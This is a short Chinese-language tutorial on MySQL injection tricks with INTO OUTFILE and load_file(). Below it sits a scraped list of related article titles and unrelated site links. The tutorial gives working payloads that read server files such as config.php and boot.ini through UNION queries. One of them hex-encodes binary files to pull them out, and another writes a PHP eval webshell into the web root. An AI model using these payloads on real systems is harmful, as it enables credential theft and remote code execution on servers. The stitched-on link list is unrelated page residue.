(1)outfile后面不能接0x开头或者char转换以后的路径,只能是单引号路径。这个问题在php注入中更加麻烦,因为会自动将单引号转义成\',那么基本没的玩了。

唯一的一种可能就是你使用mysql远程连接,然后直接在mysql中执行命令,就没有查询限制了。当然,你要是找到了phpmyadmin,也可以。

(2)load_file,后面的路径可以是单引号、0x、char转换的字符。这而记得路径中的斜杠是/而不是\。

一般用load_file来看config.php(即mysql的密码),apache配置、servu密码等。前提是要知道物理路径。

(3)load_file可以在union中作为一个字段来用。如union select 1,load_file('c:/boot.ini'),3,4 from ka_admin等。

(4)load_file可以在where字句中使用。如 and length(load_file(0x633A2F626F6F742E696E69))>1

(5)load_file文件的时候,特别是想看exe等含有二进制的00等截断或者回车换行等特殊符号时,可以结合hex函数。如union select 1,hex(load_file('c:/windows/notepad.exe')),3 from xxxx,这样就不会存在截断了,也不会一会断行而截断。自己再用个工具或者几行代码转换回来就是了。

(6)outfile一句话(经典):select '<?php eval($_POST[cmd])?>' into outfile 'D:/PHPnow-1.5.4/htdocs/index2.php'

或者从表中

select * from a into outfile 'D:/PHPnow-1.5.4/htdocs/index2.php'

(7)关于mysql多语句:直接在mysql中,可以同时select中使用update或者insert,但是php注入中就不行,至少我测试的是php的函数mysql_query是不行。

mysql 注入 file load_Mysql注入中into outfile和load_file()总结相关推荐

  1. mysql注入 outfile_Mysql注入中的outfile、dumpfile、load_file函数详解

    在利用sql注入漏洞后期,最常用的就是通过mysql的file系列函数来进行读取敏感文件或者写入webshell,其中比较常用的函数有以下三个 into dumpfile() into outfile ...

  2. mysql注入中的outfile、dumpfile、load_file函数详解

    在利用sql注入漏洞后期,最常用的就是通过mysql的file系列函数来进行读取敏感文件或者写入webshell,其中比较常用的函数有以下三个 into dumpfile() into outfile ...

  3. MySQL注入读写文件、HTTP头中的SQL注入和cookie注入

    MySQL注入读写文件 MySQL数据库在渗透过程中能够使用的功能还是比较多的,除了读取数据之外,还可以进行对文件进行读写(前提是权限足够) 读取前提: 1.用户权限足够高,尽量具有root权限 2. ...

  4. mysql注入大全_mysql注入大全及防御

    0.明白存在的位置:get型 post型 cookie型 http头注入 1.先测试注入点,注册框.搜索框.地址栏啥的,判断是字符型,搜索型还是数字型 字符型 1' and '1'='1 成功, 1' ...

  5. mysql注入之dns注入

    文章目录 一.DNS-LOG使用(域名解析日志) (一)DNS简介 (二)LOG日志是怎么产生的? (三)DNS-LOG在渗透测试中的应用 二.DNS注入相关知识回顾 (一)load_file() 读 ...

  6. Mysql的sql注入_MySQL SQL注入

    如果通过网页需要用户输入一些数据信息,并将其插入到MySQL数据库,这是一个引入SQL注入安全问题的机会.这一节将学习如何防止这种情况的发生,并帮助保护脚本和MySQL语句. 通常注入是在当要求用户输 ...

  7. mysql 宽字符注入_sql注入 宽字节注入

    宽字节注入 宽字节注入是利用mysql的一个特性,mysql在使用GBK编码的时候,会认为两个字符是一个汉字(ascii码要大于128,才到汉字的范围), 而当我们输入有单引号时会自动加入\进行转义而 ...

  8. mysql占位符 防注入_PyMySQL防止SQL注入

    一.SQL注入简介 SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编程时的疏忽,通过SQL语句,实现无帐号登录,甚至篡改数据库. 二.SQL注入攻击的总体 ...

  9. mysql sql宽字节注入_sql注入之宽字节注入

    宽字节注入是因为数据库使用了GBK编码,不过现在大都使用unicode国际编码,大多数网站都使用了utf-8的编码 不过既然是sql注入的一部分,也搭建环境  做做实验 实验环境: wamp集成包 实 ...

最新文章

  1. 漫话:如何给女朋友解释什么是系统可用性?
  2. docker file 打包jar_Spring Boot 的项目打包成的 JAR 包,制作成 docker 镜像并运行
  3. 单链表反转的原理和python代码实现
  4. 拒绝卡顿,揭秘盒马鲜生 Android 短视频秒播优化方案
  5. 容器学习 之 共享数据(十六)
  6. oracle按时间点还原数据
  7. git 修改本地用户名_git简单介绍
  8. js html模板生成图片不显示,网页中图片不显示问题
  9. CentosX64使用yum快速搭建xen虚拟化环境
  10. 查看 chrome 浏览器中的 Headers
  11. Grails Quartz插件,定时调度任务
  12. android端口扫描工具,Android系统端口扫描器编写初探
  13. win10计算机策略组在哪,win10家庭版的组策略在哪里打开
  14. c语言贪吃蛇答辩项目,贪吃蛇项目V1答辩.PDF
  15. 1024为大家带来个猜数字游戏
  16. 面试中被问到:你在工作中碰到的最困难的问题是什么?
  17. matlab 中点法,中点法解常微分方程(组)
  18. 小米路由器安装花生壳实现外网映射
  19. 办公室 VR 黄片,骚操作!微软 HoloLens 之父辞职!
  20. Linux中文件的压缩和解压缩

热门文章

  1. 具有Spring的简单工作流引擎
  2. XML解组基准:JAXB,STAx,Woodstox
  3. ORM仇恨者无法理解
  4. 使用Jolokia和JMX进行客户端服务器监视
  5. (案例)使用Cookie保存用户最后一次访问的时间
  6. Linux 命令之 grep -- 强大的文本搜索工具/正则表达式搜索
  7. Windows 命令终端(CMD)的快捷键
  8. HH SaaS电商系统的商品系统设计
  9. 数据库SQL语言分类(DDL/DML/DQL/TCL/DCL)
  10. android+udp传输大小,Android UDP数据包如何接收可变大小的数据包